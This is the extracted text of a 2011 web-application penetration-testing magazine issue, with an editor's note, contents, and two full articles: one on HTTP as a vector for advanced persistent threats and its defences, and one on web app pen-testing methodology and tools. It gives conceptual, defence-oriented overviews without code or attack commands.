You are on page 1of 45

a

EDITORS NOTE
Have you ever wondered how important for IT security is the security of web applications? The brand new November issue of Web App Pentesting magazine will attempt to provide you some answers. This new Web App Pentesting features information about Web Application Security and Vulnerabilities. For the first time we would like to present the penetration testing topic from web applications point of view. We publish the articles about how important is Pentesting in WAS. We gathered a very good articles from different sources to give you a deep insight into this matter. In November issue you will find a very good article on the Significance of HTTP Protocol and Web for Advanced Persitetnt Threats written by Matthieu Estrade. He shows us the importance of APT attacks. The article is exhaustive mini-guide to APT and how particular threats can be defined as APTs. On page 6 to find out more about the APT. Go to pages 12-21 to read the articles about WAS. The first article is written by Bryan Soliman on Web Application Security and Penetration Testing. He introduces you to nature of Pen testing for web applications. I think that most of you will find this article very useful and informative overview of WAS. Just read page 12. Web Application Vulnerabilities. Two great articles covers important aspects of this metter. I would like to introduce you Herman Stevens article Pulling legs of Arachni that specifies analysis of Arachni web application vulnerability scanner. More on page 22. Second worth of read article is XSS Beef Metaspoilt Exploitation written by Arvind Doraiswamy. Author describers Cross Site Scripting with all practical aspects page 30. All articles are very interesting and they need to be marked as Need to be Read! As always! Thank the Beta Testers and Proofreaders for their excellent work and dedication to help make this magazine even better. Special thanks to all authors that help me create this issue. I would like to mention some supporters this time and thank Jeff Weaver, Daniel Wood, Edward Wierzyn for their help and gorgeous ideas. They work really hard to get magazine out for you to read. I also would like to thank all of other helpers for their contribution to the magazine. The last but not least I would like to welcome Ryk Edelstain on our Advisory Board! Ryk has over 30 years of experience in IT Security. As he describes himself I have a profound understanding of technology, and the practices behind penetration testing. Although I work with others technical resources to handle the technical aspect of IT threat assessment, my training is in TSCM (Technical Surveillance CounterMeasures) for the detection and neutralization of both analogue and digital surveillance technologies. In fact, the practice and processes I have learned in the TSCM practice parallels those of PT, where the environment is assessed, a strategy and process is defined, and a documented and methodical process is executed. Results are continually evaluated at each step, and as the environment is learned the process is refined and executed until the assessment is complete. Ryk will help us to make PenTest more worth of reading! Enjoy reading new Web App Pentesting! Katarzyna Zwierowicz & Pentest team

Web Application Security and Vulnerabilities

ADVANCED PERSISTENT THREATS

06

The significance of HTTP and the Web for Advanced Persistent Threats
by Matthieu Estrade

The means used to achieve an APT are often substantial and proportional to the criticality of targeted data note Matthieu Esterade. Author claims that APT are not just temporary attacks, but real and constant threats with latent effect that need to fought in the long run. The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations. Reallife experience of application management highlights difficulties in implementing all the good practices. How important APT is you can find out reading the article.

12

WEB APP SECURITY


by Bryan Soliman

Web Application Security and Penetration Testing

Author shows the importance of Penetration Testing in Web Application Security. Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase. Automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications.

20

by Paolo Perego

Developers are form Wenus, Application Security guys from Mars

We know that Application Security people talk a different language than developers do whenever we publish a report, make an assessment, or when we review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code. Paolo Perego shows in his article how difficult the communication between this two groups is.

22

WEB APP VULNERABILITIES


Pulling legs of Arachni
by Herman Stevens
Herman Stevens shows us in-depth analysis of Arachni. Arachni is a fire-and-forget or point-andshoot web application vulnerability scanner developed http://pentestmag.com

01/2011 (1) November

Page 4

CONTENTS

in Ruby by Tasos Zapotek Laskos. Step by step author acquaints us with process of instalation and using the programm. Also shows us clearly the advantages and disadvantages of Arachni.

30

XSS BeeF Metaspolit Exploitation


By Arvind Doraiswamy

Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victims browser. The impact of an XSS attack is only limited by the potency of the attackers JavaScript code. In this article, Arvind Doraiswamy shows us how an attacker can gain complete control over a users browser, ultimately taking over the users machine, by using BeeF.

TEAM
Editor: Katarzyna Zwierowicz katarzyna.zwierowicz@software.com.pl Betatesters: Jeff Weaver, Daniel Wood, Edward Wierzyn, Davide Quarta Senior Consultant/Publisher: Pawe Marciniak CEO: Ewa Dudzic ewa.dudzic@software.com.pl Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl DTP: Ireneusz Pogroszewski Production Director: Andrzej Kuca andrzej.kuca@software.com.pl Marketing Director: Ewa Dudzic ewa.dudzic@software.com.pl Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.pentestmag.com Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by

34

Cross-site request forgery. In-depth analysis


by Samvel Gevorgyan

Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users. Samvel Gevorgyan step by step describes how to proceed with CSRF vulnerability.

WEB APPS CHECKING

38

First the Security Gate, then the Airplane


by Olivier Wai

Olivier Wai is trying to give us the answer What needs to be heeded when checking web applications?. Any web application, old or new, needs to be secured by a Web Application Firewalls (WAFs) in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place Web Application Firewalls (WAFs). If penetration testers are not only looking for a security snap shot, but want to help their customers in creating sustainable security, they should always include the WAFs administration into their assessment.

Mathematical formulas created by Design Science MathType

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

01/2011 (1) November

Page 5

http://pentestmag.com

ADVANCED PERSISTENT THREATS

The Significance
Of HTTP And The Web For Advanced Persistent Threats
Initially created in 1989 by Tim Berners-Lee of the CERN, Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 a mere time lapse of twenty-two years, in the transmission of Web-based content.

he omnipresence of the Web is now a given and it serves a wide variety of situations, as detailed n the non-exhaustive list below:

Community applications Institutional Web sites Online transactions Business applications Intranet/Extranet Entertainment Medical data Etc.

difficult to be sure that requests received during browsing emanate from the same user. Large scale use of the Web illustrates the discrepancy that exists in terms of security versus volume, and this inherent flaw has become a major IT system issue, making HTTP a preferred vector of attacks and data compromise. Cybercriminals are aware of the exploitability of the Web and have made it their number one target. Not a week goes by without a an organization being compromised via HTTP: Playstation Network (Sony) -> Wordpress version problem MySQL (Oracle) -> SQL Injection RSA (EMC) -> SQL Injection TJX -> SQL Injection

In response to user requirements and developing needs, content driven by HTTP has become increasingly rich and dynamic. It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that espouses different platforms: PC, Mac and Mobile users all form part of the connected masses operating on their chosen platforms. But have these new privileges arrived without any underlying constraints? The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web. A concrete example is the fact that HTTP does not provide native support for sessions, and it is therefore
01/2011 (1) November

The above attacks, conceived and carried out with precise attention to logistics, are by no means an innovation, but we now refer to them differently, using the term APT: Advanced Persistent Threat. Bolstered cyber-activity, the discovery of intrusion and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage, which in turn amplifies the impact on the image of the unfortunate victims that are more often than not highprofile businesses or international organizations.
http://pentestmag.com

Page 6

Anatomy of an APT

Advanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose, that of retrieving sensitive or critical data. Several steps are necessary to reach the goal: The initial intrusion Continued presence within the IT system Bounce mechanism and in depth infiltration Data extraction

HTTP plays an important role during the attacks, firstly because it is predominantly present during the various stages, and furthermore because it is often the only available protocol that can serve as an attack vector.

The use of HTTP may be required because different areas are often filtered out, leaving only necessary protocols to emerge. HTTP is often left open to allow administrators to navigate through these machines, or to update them. To remain as stealthy as possible, a strategic backdoor to the Web application or the application server will use HTTP as a direct connection and / or as a tunnel to other applications. During the movement it will not be filtered and no attention will be drawn to a process that opens a port unknown to the system.

Bounce Mechanisms

The Initial Intrusion

The system is invaded by an attack focused on an area exposed to the public on the Internet. In the case of Sony Playstation Network for instance, the intrusion took place via their blog that used a vulnerable version of WordPress. These days it is unusual for any organization to do without a website, and the latter can range from basic and simple to complex and dynamic. The website plays the role of a gateway that provides the initial point of entry into an infrastructure. It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack. In addition, depending on the application infrastructure location and lack of compartmentalization, it is possible for a simple, scarcely-used application to be found near or on the same server as a business application. The attack will bounce from the one to the other, and the business application which will then become accessible and provide more access privileges. Retrieval of information is often the vital issue during the bounce mechanism and and extended infiltration intothe system. Some examples of the data targeted: User Passwords Hardware and network destinations -> discovery Connectors to other systems -> new protocols Etc.

Whenever changes occur witin an IT system, the steps involving initial intrusion and continued presence are repeated as many times as necessary until it the goal is attained and sensitive data becomes accessible. HTTP once again comes into play during these stages of development because it is predominantly active and open between the different areas: Dialogue between server applications Web Services Web Administration Interface Etc.

It often happens that security policies contain the same weaknesses from one area to another: Exit ports opened Filtering omission on higher level ports Use of the same default passwords

Data Extraction

Once crucial information is reached, it is necessary to quit the system as discreetly as possible and over a certain length of time. HTTP protocol is often enabled for exit without being monitored for several reasons: Machines are often updated using HTTP When an administrator logs on to a remote machine, he will often require access to a website Since these areas are often regarded as safe zones, restrictions are lower and controls less strict

What Protective Measures Can Be Deployed?

Continued presence

After the initial inroads into the structure the next phase requires that presence within the system remains secure. The machine has to be re-accessed and exploited without arousing the suspicions of system administrators.
01/2011 (1) November

Application security has become major issue in the business world. Whereas network security is fairly conventional and primarily leans on the filtering of destinations, sources, IP and Ports in most cases, application security is more complex and involves applications that are often unique, bespoke and
http://pentestmag.com

Page 7

ADVANCED PERSISTENT THREATS


deployed with many more specifications relating to infrastructure. Three steps are necessary to prevent or respond properly to an APT: Prevention Response Forensics hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case, it is necessary to predefine the tools and procedures for investigations and / or monitoring.

Prevention

Ideally, security should be addressed at the very beginning, when software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.

Risk analysis and attack guidelines

Define a Secure Application Infrastructure


Partition the Network
This measure is one of the pillars of the PCI-DSS and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult to obtainsatisfaction because of the large number of bounces required to attain sensitive data. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound. Moreover, partitioning allows for easier forensic analysis in case of a compromise. It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately. Unfortunately, there are many systems, described as flat infrastructures, that contain a variety of applications housed in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.

This step allows a precise understanding of risks based on the data manipulated by applications. It has to be carried out by studying web applications, their operation and business logic. Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.

Developer Training

Applications are commonly developed following specific business imperatives, and often with the added stress of meeting availability deadlines. Developers do not place security high up on their list of priorities, and it is often overlooked in the process. However, there are several ways to significantly reduce risk: Raising developer awareness of application attacks OWASP TOP10 WASC TC v2 The use of libraries to filter input Libraries are available for all languages Setting up audit functions, logs and traceability Accurate analysis of how the application works

Separation of Applications

Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages: It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure It enhances understanding of an attack and by doing so facilitates the search for evidence which will then be based on the criticality of data and complexity of applications

Regular Auditing
Code analysis
You can resort to manual code analysis by an auditor, or to automated analysis by using the tools available to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful to detect vulnerabilities before going into production, and thus to fix them before they are exploited. Unfortunately, the practice is only possible if you have access to the source code of the application. Closed source software packages cannot be analyzed.

Scanning and penetration testing

Anticipate Possible Outcomes

To better understand the scope of an attack, it is necessary to anticipate the options available to a
01/2011 (1) November

All applications can be scanned and pentested. They also require configuration and / or a thorough analysis of the application to determine the credentials necessary
http://pentestmag.com

Page 8

for navigation or resources to be avoided because of their capacity to cause significant damage (eg. links enabling the deletion of entries in the database). These tests have to be reproduced as often as possible, and whenever a change in the application is put in place by developers.

Appropriate Response

Traditional firewalls do not filter network application protocols, at best, the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS, by recognizing attack patterns. This response is clearly inadequate. Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself. This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels. Last but not least, the association of the identity context with security policy allows better detection of anomalies.

kind of protection. Their position in the application infrastructure however is much more critical. They are often located at the heart of sensitive information zones, and connected directly via private links to partner infrastructures. The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails contract between two parties on the type of use (eg. number of messages per day, data type etc.). The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties.

Authentication, Authorization

Applications use identities to control access to various resources and functions. The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on user role. Ensuring Continuity of Service Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes. However, some attacks based on weaknesses can be devastating in effect, perpetrated to make the application unavailable, and thereby provoke losses due to activity downtime. To retaliate, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.

Traffic Filtering: The WAF (Web Application Firewall)

Web application firewalls can be considered as an extension of application network firewalls. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCIDSS. Often used in reverse proxy mode, it allows for a break in protocol and facilitates the restructuring of areas between applications. The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed. The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls).

Operation
Monitoring
It is important to understand the use of the application during production, to monitor and detect abnormal behavior, and make decisions accordingly: Blacklist Legal Action Redirection to a honeypot

Traffic Filtering: The WSF (Web Services Firewall)

It represents an extension of the WAF on the protocols carrying XML traffic over HTTP, such as SOAP or REST. XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL, Schemas). Web services are vulnerable to the same attacks as web applications; they consequently need the same
01/2011 (1) November

Log Correlation

Understanding abnormal behavior in an application helps in locating an attack. An application infrastructure can comprise hundreds of applications. To understand the attack as a whole and monitor changes (discovery, aggression, compromise), it is necessary to have holistic view.
http://pentestmag.com

Page 9

ADVANCED PERSISTENT THREATS


To do this, it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics. Mass Attack on a type of application Attack targeting a specific application Attacks focused on a type of data Unknown daemons or unusual groups and users Etc.

Analysis of network equipment

Reporting and Alerting

The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams. Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resources / areas, or more directly by referral to a honeypot in view of analyzing the behavior of the attacker.

During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check if there are connections to web applications at unusual times.

The End justifies the Means

Forensics
Understanding the scope of an attack
For each area compromised, it is important to understand what elements have been impacted, and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor, bounce mechanisms to other areas and / or extraction of data.

In conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data. APT are not just temporary attacks, but real and constant threats with latent effect that need to fought in the long run. The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations. Real-life experience of application management highlights difficulties in implementing all the good practices. A comprehensive study of threats, appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks.

Analysis of application components

To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable, a cookie. To drill down to this level, the logs of the various application components turn out to be very useful: Web server or application Database Directory Etc.

Systems Analysis

To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act such as the placing an executable file in the application itself, to the injection of code into a process (eg hook network functions), it is necessary to analyze the system hosting the application. Changed configuration files Users added Security rules changed Errors of execution or increase in privileges
01/2011 (1) November

MATTHIEU ESTRADE
Matthieu Estrade has 14 years experience in internet security. In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance. As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.

Page 10

http://pentestmag.com

WEB APP SECURITY

Web
Application Security and Penetration Testing
In the recent years, web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businesses lifecycle.

ynamic web applications usually use technologies such as ASP, ASP.Net, PHP, Ajax, JSP, Perl, Cold Fusion, Flash, and etc. These applications expose financial data, customer information, and other sensitive and confidential data that required authentication and authorization. Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications. With the accessibility of such critical data to the public domain, web application security testing also becomes paramount process for all the web applications that are exposed to the outside world.

Introduction

Identification of Ports In this process, ports are scanned, and the associated services running are identified. Software Services Analyzed In this process, both automated, and manual testing is conducted to discover weaknesses. Verification of Vulnerabilities This process helps verify that the vulnerabilities are real, where weakness might be exploited to help remediate the issues. Remediation of Vulnerabilities In this process, the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed.

Penetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks. Such process requires a deep knowledge, experience in a variety of different tools, and a range of exploits that can achieve the required tasks. During the pen testing different web applications vulnerabilities are tested (e.g. Input Validation, Buffer Overflow, Cross Site Scripting, URL Manipulation, SQL Injection, Cookie Modification, Bypassing Authentication, and Code Execution). A typical pen testing involves the following procedures:
01/2011 (1) November

Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced, and also the severity of any defects that do remain undetected can be reduced or eliminated. Despite the fact that the above initiatives solve some of the security problems, some of undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence, and put the anomalies into context or make normative judgments about them, the struggle to find certain vulnerabilities will exist.
http://pentestmag.com

Page 12

Automated Scanning vs. Manual Penetration Testing

A vulnerabilities assessment simply identifies and reports vulnerabilities; whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible. By performing a pen testing to simulate an attack, its possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application. With more than 75% of the attacks occurring over the HTTP/S protocols, and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data exist within web applications, consumers not only expect, but also demand security for this information. That said; securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes. The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application, and the countermeasures that are required to be implemented. It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle. Discovering web application vulnerabilities can be performed through different processes:

Automation process where scanning tools or static analysis tools will be used. Manual process where penetration testing or code review will be used.

Web application vulnerability types can be grouped into two categories:

Technical Vulnerabilities

Where such vulnerabilities can be examined through the following tests: Cross-Site-Scripting, Injection Flaws and Buffer Overflow. Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests. While automated testing and scanning tools may not be able
01/2011 (1) November

WEB APP SECURITY


to address 100% of all the technical vulnerabilities, there is no reason to believe that such tools will achieve such goal in the near future. Current problems facing the web application tools are the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one time passwords, and Infinite web sites with random URL-based session IDs. History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, where it can lead to unauthorized access to the systems, networks and application information. It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). In such attacks, traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications. Security analyses review the critical components of a web-based portal, e-commerce application, or web services platform. Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented, back-end database or web server used by the application. Its imperative to point out that the web application penetration assessments should be designed based upon defined threat-model. It should also be based upon the evaluation of the integration between components (e.g. third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment. Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities,

Logical Vulnerabilities

Where such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done. While both an automated scanning tool and skilled penetration tester can navigate through a web application, only the latter is able to understand what the logic behind specific workflow or how the application works in general. Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed. For instance, an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, and bypassing the security validation exists at point B.

Figure 1. The different activities of the Pen Testing processes

01/2011 (1) November

Page 14

http://pentestmag.com

and allow to find similar instances of vulnerabilities throughout the code.

How Web Application Pen Testing Works?

Most of the web applications penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies. At the end of such test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portal, and ecommerce application). Figure-1 describes some of the activities that usually happen during the pen testing process. Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment, and Reporting. In conducting the web penetration testing, different approaches can be used to achieve the security vulnerabilities assessment, some of these approaches are: Zero-Knowledge Test (Black Box) In such approach, the application security testing team will not have any of inside information about the target

environment, and the expected knowledge gain will be based on information that can be found out in the public domain. This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems. Partial Knowledge Test (Gray Box) In such approach a partial gain of knowledge about the environment under testing will be achieved before conducting the test. Source Code Analysis (White Box) In such ap-proach the penetration test team has fill information about the application and its source code. In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.

Its also important to point out that penetration testing can be achieved through two different types of testing: External Penetration Testing Internal Penetration Testing

Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box).

Figure 2. The different phases of the Pen Testing

01/2011 (1) November

Page 15

http://pentestmag.com

WEB APP SECURITY


Figure-3 shows different procedures and steps that can be used to conduct the penetration testing. The following are the description of these steps: Scope and Plan In this step, the scope of the penetration testing is identified, and the project plan and resources will be defined. System Scan and Probe In this step, the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports, scanning the system to detect vulnerabilities, and hostnames, and IP addresses previously collected will be used at this stage. Creating of Attack Strategies In this step, the testers prioritize the systems and the attack methods will be used based on the type of the system, and how critical these systems. Also, in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase. Penetration Testing In this step, the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests: data & service pilferage test, buffer overflow, privilege escalation, and denial of services (if applicable). Documentation In this step, all the vulnerabilities discovered during the test are documented, evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report. Improvement The final step of the penetration testing is to provide the corrective actions on closing the discovered vulnerabilities within the systems and the web applications.

Web Applications Testing Tools

Through the Pen testing, a specific structure methodology has to be followed where the following steps might be used: Enumeration, Vulnerabilities Assessment and Exploitation. Some of the tools that might be used within these steps are: Port Scanners Sniffers Proxy Servers Site Crawlers Manual Inspection

The output from the above tools will allow the security team to gather information about the environment such as: Open ports, Services, Versions, and Operating Systems. The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server (s), database server (s) and any intermediary devices such as firewalls and load-balancers. Its also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities, manual inspection for items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well. Some of the areas that can be covered during the vulnerabilities assessment are the following: Input validation Access Control

Figure 3. Testing techniques, procedures and steps

01/2011 (1) November

Page 16

http://pentestmag.com

Authentication and Session Management (Session ID flaws) Vulnerabilities Cross Site Scripting (XSS) Vulnerabilities Buffer Overflows Injection Flaws Error Handling Insecure Storage Denial of Service (if required) Configuration Management Business logic flaws SQL Injection faults Cookie manipulation and poising Privilege escalation Command injection Client side and header manipulation Unintended information disclosure

During the assessment, testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions, and usually discussed beforehand. Possible options of Denial of Service testing include testing during a specific time, testing a development system or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerabilities assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered which is the informative report thats highlights all the risks found during the penetration phase. The following are some of the commonly used tools for traditional penetration testing:

attempt to exercise vulnerabilities on their targeted systems. The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, and exercising each defect on each available service of the target hosts. Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects, or problem with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test, they are fundamental tools for any penetration testing. Good examples for such tools are: Internet Scanners, QualysGuard, or Core Impact.

Application Scanners

Most of the application scanners can observe the functional behaviour of an application, and then attempt a sequence of common attacks against the application. Popular commercial application scanners include Appscan, and WebInspect.

Web application Assessment Proxy

Port Scanners

Such tools are used to gather information about which network services are available for connection on each target host. The port scanning tools usually examines or questions each of the designated network ports or service on the target system. Most of these tools are able to scan both TCP as well as UDP ports. Another common feature of port scanners is their ability to examine the operating system type, and its version number since protocol such as TCP/IP implementation can vary in their specific responses. The configuration flexibility in the port scanners serve examining the different port configuration, as well as employ the ability to hide from the network intrusion detection mechanisms.

Assessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated. Such flexibility adds different tricks to exercise the applications weaknesses, and its associated components. For example, the penetration testers can view all cookies, hidden HTML fields and other data used by the web application, and attempt to manipulate their values to trick the application. The above penetration testing practice called a black box testing. Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used. Most of the penetration testing tools can perform the penetration testing practices, however choosing the right tool for the job is something vital for the success of the penetration process, and the accurate results. The following are some of the common features that should be implemented within the penetration testing tools: Visibility The tool must provide the required visibility for the testing team that can be used as a feedback, and reporting feature of the test results. Extensibility The tool can be customized, and it must provide scripting language or plug-in
http://pentestmag.com

Vulnerability Scanners

While port scanners only produce an inventory of the types of available services, the vulnerability scanners
01/2011 (1) November

Page 17

WEB APP SECURITY


capabilities that can be used to construct customized the penetration testing. Configurability Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process. Documentation The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing. License Flexibility The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers, and license limits is a better tool than others. a weakness or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase. Unfortunately, an all clear result from a penetration test doesnt mean that an application has no problems. Penetration tests can miss weakness such as session forging and brute-forcing detection, and as such; implementing security throughout an applications lifecycle is imperative process for building secure web applications. As automated web application security tools have matured in the recent years, and over time, automated security assessment will continue to both reduce any uncertainty of determination (i.e. false positive results), and the potential to miss some issues (i.e. false negatives results). Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently the automated tools cant be entirely used as a replacement of the manual penetration test. However, if the automated tools are used correctly, organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications. The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing. Finally, it is important to point out that over time, the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size, and the scope of such applications, and their complexity increase. The fact that many enterprise organizations will not be able to dedicate the time, money, and the effort required to assess the thousands of web applications, will increase the chances of using the automated tools rather than using the human factor to manually testing these applications. Also, relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors, and simply cant be trusted.

Security Techniques for Web Apps

Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are: Sanitize the data coming from the browser Any data that is sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookies data, XML, etc.). If web developers fail to sanitize the incoming data from unwanted data, it might lead to vulnerabilities such as SQL injection, cross site scripting, and other attacks against the web application. Validate data before form submission, and manage sessions To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form. It is imperative for the web application to verify that the user form is the one that the web application had produced and served. Configure the server in the best possible way network administrators have to follow some guidelines for hardening the web servers. Some of these guidelines are: Maintain and update proper security patches, kill all the redundant services and shutdown unnecessary ports, confine access rights to folders and files, employ SSH (Secure Shell network protocol) rather than using telnet or FTP, and install efficient anti-malware software.

In addition to the above guidelines, it is always important to implement strong passwords for the web applications users, and cleaning stored passwords.

BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience with Bachelor degree in Engineering, bachelor degree in Computer Science, and Master degree in Computer Science.

Conclusion

A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system where such process determines if there is
01/2011 (1) November

Page 18

http://pentestmag.com

WHAT IS A GOOD FUZZING TOOL?


